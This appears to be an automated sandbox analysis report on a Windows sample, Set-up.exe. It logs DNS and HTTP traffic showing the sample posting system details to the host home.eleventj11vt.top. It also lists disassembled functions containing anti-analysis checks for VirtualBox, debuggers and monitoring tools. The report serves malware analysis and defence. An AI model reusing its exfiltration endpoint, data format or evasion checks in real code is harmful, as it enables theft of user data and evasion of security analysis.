Dec 31, 2024 16:42:12.322319984 CET	192.168.2.4	1.1.1.1	0xfb8b	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 31, 2024 16:42:24.996184111 CET	192.168.2.4	1.1.1.1	0x20b6	Standard query (0)	home.eleventj11vt.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:42:24.996263027 CET	192.168.2.4	1.1.1.1	0x3ef2	Standard query (0)	home.eleventj11vt.top	28	IN (0x0001)	false
Dec 31, 2024 16:42:29.465282917 CET	192.168.2.4	1.1.1.1	0xed6c	Standard query (0)	home.eleventj11vt.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:42:29.465341091 CET	192.168.2.4	1.1.1.1	0xcb22	Standard query (0)	home.eleventj11vt.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 16:42:12.329924107 CET	1.1.1.1	192.168.2.4	0xf695	No error (0)	httpbin.org	34.200.57.114	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:42:12.329924107 CET	1.1.1.1	192.168.2.4	0xf695	No error (0)	httpbin.org	34.197.122.172	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:42:25.661195993 CET	1.1.1.1	192.168.2.4	0x20b6	No error (0)	home.eleventj11vt.top	34.147.147.173	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:42:30.283088923 CET	1.1.1.1	192.168.2.4	0xed6c	No error (0)	home.eleventj11vt.top	34.147.147.173	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.eleventj11vt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	34.147.147.173	80	5324	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 16:42:25.682598114 CET	12360	OUT	POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1 Host: home.eleventj11vt.top Accept: / Content-Type: application/json Content-Length: 560661 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 38 38 33 34 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317488340", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 31, 2024 16:42:25.687525988 CET	2472	OUT	Data Raw: 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 2b 33 2b 66 77 72 39 67 76 45 6e 5c 2f 42 4a 33 56 66 44 46 34 49 4c 37 34 30 2b 5a 5a 7a 4f 56 73 39 53 68 2b Data Ascii: \/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9gvEn\/BJ3VfDF4IL740+ZZzOVs9Sh+Gpa1uRyQjZ8ffuLoKCZLWRi67WaNpodkz0rX\/AIJZLc4z8d\/LJ7f8Kw3f+9DXPOPev4PxH7TP6EWEr1MNifGqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD9nX9MapTjVp+D8Z05K6lHxD8K5J\/
Dec 31, 2024 16:42:25.687560081 CET	4944	OUT	Data Raw: 6a 74 6f 50 71 62 5c 2f 68 7a 46 5c 2f 77 54 57 5c 2f 36 4e 75 5c 2f 38 41 4d 77 5c 2f 48 76 5c 2f 35 36 56 66 35 6b 34 62 39 6f 6c 78 6e 6a 38 50 52 78 32 41 38 41 65 48 56 67 63 5a 53 68 69 73 45 73 79 38 61 73 77 77 6d 59 66 56 4b 38 56 56 77 Data Ascii: jtoPqb\/hzF\/wTW\/6Nu\/8AMw\/Hv\/56Vf5k4b9olxnj8PRx2A8AeHVgcZShisEsy8aswwmYfVK8VVwzxuFwfg3mmEw2LlRlCVfD4bMsfRo1XKnTxmIjFVZf7ZZ7+yf+jvwtnWa8NZ39MvxbxWdcP5jjMlzjEcM\/Q94TzPh2pmuWV54PMXkWZZ59MHhbOMxylYyjWjgMdmfDeQ43F4VUsRiMoy+pUlhaf8kNFf1vf8OYv+C
Dec 31, 2024 16:42:25.687575102 CET	4944	OUT	Data Raw: 74 49 79 64 67 35 56 39 4b 38 4a 61 51 41 33 69 48 78 68 42 63 33 41 43 46 74 49 38 47 32 5a 38 52 58 63 55 6d 64 7a 51 58 6d 73 58 4d 2b 6b 2b 47 59 6f 32 54 43 72 65 36 4c 71 33 69 58 79 70 48 2b 61 7a 66 59 79 6e 75 66 68 70 38 54 4e 50 2b 4c Data Ascii: tIydg5V9K8JaQA3iHxhBc3ACFtI8G2Z8RXcUmdzQXmsXM+k+GYo2TCre6Lq3iXypH+azfYynufhp8TNP+L3wU0\/x9ptvPaR61oVyLy2mgnhS21eyjay1q0tJJ1U3lnZatBeWcF7HujuBblgQwdV+ca\/IsxzniTKqlbKcVVWGxmCrVsLiXPDUfrdHEYao6NWlJ8rw1ozjJaYbn5k2qjVkftGWcN8I5zTw+d4OjPFYHH4fD4zBx
Dec 31, 2024 16:42:25.687707901 CET	4944	OUT	Data Raw: 66 44 5c 2f 41 4d 4d 52 58 63 7a 33 45 38 48 68 5c 2f 77 41 4a 65 4d 4c 5c 2f 41 45 62 53 6f 5a 5a 6e 4a 61 53 51 57 31 71 6a 7a 4f 78 4a 6b 6d 65 53 52 69 57 63 6b 34 74 65 6c 66 48 37 5c 2f 6b 36 7a 39 73 76 5c 2f 41 4c 4f 2b 5c 2f 61 49 5c 2f Data Ascii: fD\/AMMRXcz3E8Hh\/wAJeML\/AEbSoZZnJaSQW1qjzOxJkmeSRiWck4telfH7\/k6z9sv\/ALO+\/aI\/9WPrNea1\/ut9DltfRj8HKd5OFDhRYWjGUpSVLDYTMswwuFw8OZtxo4bDUaWHoU17lKjTp0oKMIRS\/wCcP9p5UlX+nr9JXGVeWWJzLjfBZtj6yhCE8Xmeb8K8P5nmmYYjkjFVMZmOY4vFY7G4iSdTE4vEV8RWlOr
Dec 31, 2024 16:42:25.687854052 CET	2472	OUT	Data Raw: 6e 6d 4e 7a 53 6a 6c 43 34 58 6f 59 71 64 50 32 65 58 30 6e 39 5a 77 31 4a 77 6f 55 61 55 70 75 76 53 68 54 6c 4f 76 69 4a 30 35 59 6e 46 56 5a 59 61 6a 47 65 49 72 56 4b 6a 31 6c 4a 6e 39 76 35 48 34 53 63 55 63 49 35 42 67 4d 72 72 35 78 54 34 Data Ascii: nmNzSjlC4XoYqdP2eX0n9Zw1JwoUaUpuvShTlOviJ05YnFVZYajGeIrVKj1lJn9v5H4ScUcI5BgMrr5xT4sxOEpTjVzHk+o4ivetVqxjHCVqlSFKjh4VI4fDUYYus4UKNOEbJRivlX9orUPJ8L6Npykhr\/WhOw4+aGxs7gOpzzjzru3fgZyg5AyD8dbdvGMd\/Wvov9ozVrO58Q6Do1tf2V4+madd3M4s7qK6WGXULpITHI0LO
Dec 31, 2024 16:42:25.687869072 CET	2472	OUT	Data Raw: 62 31 33 55 70 41 49 39 48 74 64 53 30 47 7a 69 4d 64 7a 63 4e 46 5a 7a 58 76 69 54 54 70 33 6e 57 30 30 76 57 72 6a 54 76 77 63 5c 2f 59 6a 62 62 2b 31 39 2b 7a 57 66 2b 71 7a 2b 41 42 2b 66 69 47 79 48 39 61 5c 2f 73 50 38 41 6a 56 38 46 50 68 Data Ascii: b13UpAI9HtdS0GziMdzcNFZzXviTTp3nW00vWrjTvwc\/Yjbb+19+zWf+qz+AB+fiGyH9a\/sP8AjV8FPhf+0L8PdZ+F3xf8K2PjHwZrfkyXGnXbz29zZ31qxey1fR9TspbfUtH1ixdmNrqWm3NvdJHJPbO72lzcwTf5v\/Ss4hy7IfGnA4fPMNicXw7xN4QYPhriCngfZLMqOX4ni\/iDMKGPy327jh547Ks2yzLM1w+HxEqdD
Dec 31, 2024 16:42:25.692133904 CET	2472	OUT	Data Raw: 2f 36 39 52 31 59 70 72 5c 2f 64 50 34 66 7a 46 42 30 55 36 6d 2b 6e 39 64 31 5c 2f 58 62 55 68 71 48 42 5c 2f 75 5c 2f 77 44 6f 58 2b 4e 54 55 56 48 49 76 50 38 41 72 35 48 51 56 36 5a 33 54 36 48 2b 56 50 6f 70 65 7a 38 5c 2f 77 5c 2f 34 49 45 Data Ascii: /69R1Ypr\/dP4fzFB0U6m+n9d1\/XbUhqHB\/u\/wDoX+NTUVHIvP8Ar5HQV6Z3T6H+VPopez8\/w\/4IET9fw\/qaZUknb8ajrQ29r5y\/r5lWXv8A73+NN8v5n69fw\/yP84q5Veg6iJ02\/wAuaZViq9AUvs\/P9SPy\/f8AT\/69R1YqOTt+NB0FVo\/xH5U2rFMfp+P9DQaU+vy\/UreX7\/p\/9eo6sUUGhSkX+P0\/w7
Dec 31, 2024 16:42:25.692379951 CET	4944	OUT	Data Raw: 50 58 72 33 71 74 39 33 37 6a 5c 2f 50 5c 2f 77 41 39 50 2b 65 50 5c 2f 77 42 66 5c 2f 50 50 65 7a 39 32 50 35 45 78 78 6a 39 5c 2f 7a 5c 2f 6f 5c 2f 2b 65 33 58 38 61 61 56 4b 71 37 2b 54 30 6a 5c 2f 6d 61 30 39 70 35 66 6a 5c 2f 41 4d 41 30 44 Data Ascii: PXr3qt937j\/P\/wA9P+eP\/wBf\/PPez92P5Exxj9\/z\/o\/+e3X8aaVKq7+T0j\/ma09p5fj\/AMA0D\/bb5\/M\/dfu\/+Wvp\/jUEf\/TT\/ln9n\/dxg9P+fof5561NJHuVH3yfXzBxz9k9vsX4jpUMa+X8iJ5P7248qP8A1\/8Ay6\/rz04rMA\/v\/wDXLzcyfl7\/ANfX1pn\/AAONP+Wv2j17+3p\/nPL49nmZ37I
Dec 31, 2024 16:42:25.692472935 CET	4944	OUT	Data Raw: 50 57 39 62 30 44 34 68 5c 2f 42 72 34 68 5c 2f 45 36 7a 2b 44 64 6c 34 35 38 47 74 64 65 45 64 4a 31 61 79 68 38 4e 66 45 6d 38 48 68 48 78 76 34 62 2b 49 75 6b 5c 2f 44 5c 2f 41 4d 61 65 46 4e 61 74 72 33 54 39 56 38 4e 51 33 64 72 4c 43 4d 4c Data Ascii: PW9b0D4h\/Br4h\/E6z+Ddl458GtdeEdJ1ayh8NfEm8HhHxv4b+Iuk\/D\/AMaeFNatr3T9V8NQ3drLCMLxhqUPgzwrofiq71Xwtqo1u\/8Ag9pT+FtD1fV7vxroOo\/tAeGfFHjb4M2fiDSLjw1Z6bDP8Q\/BnhS78UaBFpGua1M2l6jopvYrK61GK2H5fxbxJ4H+I\/D8Mk4qz7Js3yPGZ5gMAsHLM80yyp\/b0alsHg60sBW
Dec 31, 2024 16:42:25.692514896 CET	4944	OUT	Data Raw: 2b 49 62 4f 36 30 62 51 50 42 58 67 44 77 6c 34 78 38 61 36 31 4c 5a 61 74 71 47 6e 65 48 62 6a 51 5c 2f 44 5c 2f 69 4c 56 64 4a 6f 58 2b 74 61 4a 42 70 50 78 4c 38 55 61 46 34 36 2b 47 58 6a 7a 77 56 38 4d 66 45 6e 77 5a 38 4c 61 68 34 72 38 46 Data Ascii: +IbO60bQPBXgDwl4x8a61LZatqGneHbjQ\/D\/iLVdJoX+taJBpPxL8UaF46+GXjzwV8MfEnwZ8Lah4r8F6\/4yNv4g1L442nxEufCw0LQvGnw68E+KtOOlSfC7xXaeI7HxzoXgzWbd00vUNG0vXND1az1Z\/RxH0WPon0a1HDVPETj+UsT\/ZEKdXD8fY\/EYVz4gq4ahklGWYYXK6mEo4nNZ4vDSwFCpiaeIxFGr9ZpU3QjOr
Dec 31, 2024 16:42:29.026868105 CET	290	IN	HTTP/1.1 502 Bad Gateway server: nginx/1.22.1 date: Tue, 31 Dec 2024 15:42:28 GMT content-type: text/html content-length: 157 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	34.147.147.173	80	5324	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 16:42:30.289189100 CET	353	OUT	POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1 Host: home.eleventj11vt.top Accept: / Content-Type: application/json Content-Length: 209 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Dec 31, 2024 16:42:30.927716970 CET	290	IN	HTTP/1.1 502 Bad Gateway server: nginx/1.22.1 date: Tue, 31 Dec 2024 15:42:30 GMT content-type: text/html content-length: 157 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	34.200.57.114	443	5324	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:42:13 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-31 15:42:13 UTC	224	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 15:42:13 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-31 15:42:13 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	10:42:11
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x510000
File size:	7'793'288 bytes
MD5 hash:	3D060EC62AD0864CFD0D40F46A4F07A9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	37.6%
Total number of Nodes:	1072
Total number of Limit Nodes:	52

Executed Functions

Function 0054A550 Relevance: 67.3, APIs: 23, Strings: 15, Instructions: 777networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 0052D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,005201B1), ref: 0052D8E2

setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 0054A670
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A6A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A6AB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A6AF

Part of subcall function 0052D090: GetLastError.KERNEL32 ref: 0052D0A1
Part of subcall function 0052D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0A9
Part of subcall function 0052D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0CD
Part of subcall function 0052D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D0D7
Part of subcall function 0052D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0052D381
Part of subcall function 0052D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0052D3A2
Part of subcall function 0052D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0052D3BF
Part of subcall function 0052D090: GetLastError.KERNEL32 ref: 0052D3C9
Part of subcall function 0052D090: SetLastError.KERNEL32(00000000), ref: 0052D3D4

Part of subcall function 00554F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00554F9E

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0054A831
WSAGetLastError.WS2_32 ref: 0054A854
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0054A97A
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0054A9A6
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0054AB0F
htons.WS2_32(?), ref: 0054AC01
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0054AC38
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0054AC64
WSAGetLastError.WS2_32 ref: 0054ACDC
WSAGetLastError.WS2_32 ref: 0054ADF5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 0054AE9D
htons.WS2_32(?), ref: 0054AEDB
bind.WS2_32(?,00000002,00000010), ref: 0054AEF5
WSAGetLastError.WS2_32 ref: 0054AFB9
htons.WS2_32(?), ref: 0054AFFC
bind.WS2_32(?,?,?), ref: 0054B014
WSAGetLastError.WS2_32 ref: 0054B056
htons.WS2_32(?), ref: 0054B0D2
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 0054B0EA

Strings

Name '%s' family %i resolved to '%s' family %i, xrefs: 0054ADAC
Local port: %hu, xrefs: 0054AF28
@, xrefs: 0054A8F4
Could not set TCP_NODELAY: %s, xrefs: 0054A871
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0054A6CE
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0054AD0A
cf_socket_open() -> %d, fd=%d, xrefs: 0054A796
Bind to local port %d failed, trying next, xrefs: 0054AFE5
Trying [%s]:%d..., xrefs: 0054A689
cf-socket.c, xrefs: 0054A5CD, 0054A735
Trying %s:%d..., xrefs: 0054A7C2, 0054A7DE
@, xrefs: 0054AC42
bind failed with errno %d: %s, xrefs: 0054B080
Couldn't bind to '%s' with errno %d: %s, xrefs: 0054AE1F
Local Interface %s is ip %s using address family %i, xrefs: 0054AE60

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 2815861332-2373386790
Opcode ID: f28bf3c54d167b184a41a64a412a35ab45d5c77d19c3fc9026c349eaef3ab003
Instruction ID: b88b04c8887c4a24e90b2f0418f4d6c760909c73d5bf39e8be78805453bcf987
Opcode Fuzzy Hash: f28bf3c54d167b184a41a64a412a35ab45d5c77d19c3fc9026c349eaef3ab003
Instruction Fuzzy Hash: 2062F171544341ABE720CF24C84ABEBBBF4FF95318F044929F98997292E771A845CB93

Function 005129FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00512A27
RegOpenKeyExA.KERNELBASE ref: 00512A8A
CharUpperA.USER32 ref: 00512AEF
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512B05
CreateToolhelp32Snapshot.KERNEL32 ref: 00512B6D
Process32First.KERNEL32 ref: 00512B88
Process32Next.KERNEL32 ref: 00512BC0
QueryFullProcessImageNameA.KERNELBASE ref: 00512C26
CloseHandle.KERNELBASE ref: 00512C49
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512C5F
CreateToolhelp32Snapshot.KERNEL32 ref: 00512CC4
Process32First.KERNEL32 ref: 00512CDF
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00512D0D
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512D42
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512D5C
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512D76
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00512D90
Process32Next.KERNEL32 ref: 00512DBF
CloseHandle.KERNELBASE ref: 00512DFC
EnumWindows.USER32 ref: 00512E21

Strings

dbg_sec, xrefs: 00512DDE
dbg_third, xrefs: 00512E48
C:\USERS\PUBLIC\, xrefs: 00512AF4
procmon.exe, xrefs: 00512D4B
SYSTEM\ControlSet001\Services\VBoxSF, xrefs: 00512A76
wireshark.exe, xrefs: 00512D31
yadro, xrefs: 00512EFB
public_check, xrefs: 00512B26
dbg, xrefs: 00512C80
vbox_second, xrefs: 00512AAB
C:\Windows\System32\VBox*.dll, xrefs: 00512A1B
x64dbg.exe, xrefs: 00512D65
vbox_first, xrefs: 00512A49
ida.exe, xrefs: 00512D7F
0, xrefs: 00512DA9
WINDBG.EXE, xrefs: 00512C4E

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
API String ID: 515599682-3783588604
Opcode ID: ccbb554f86fbfa3c3e8f18c359ba2bc8bc7740f13415fe9670694773b0a21f84
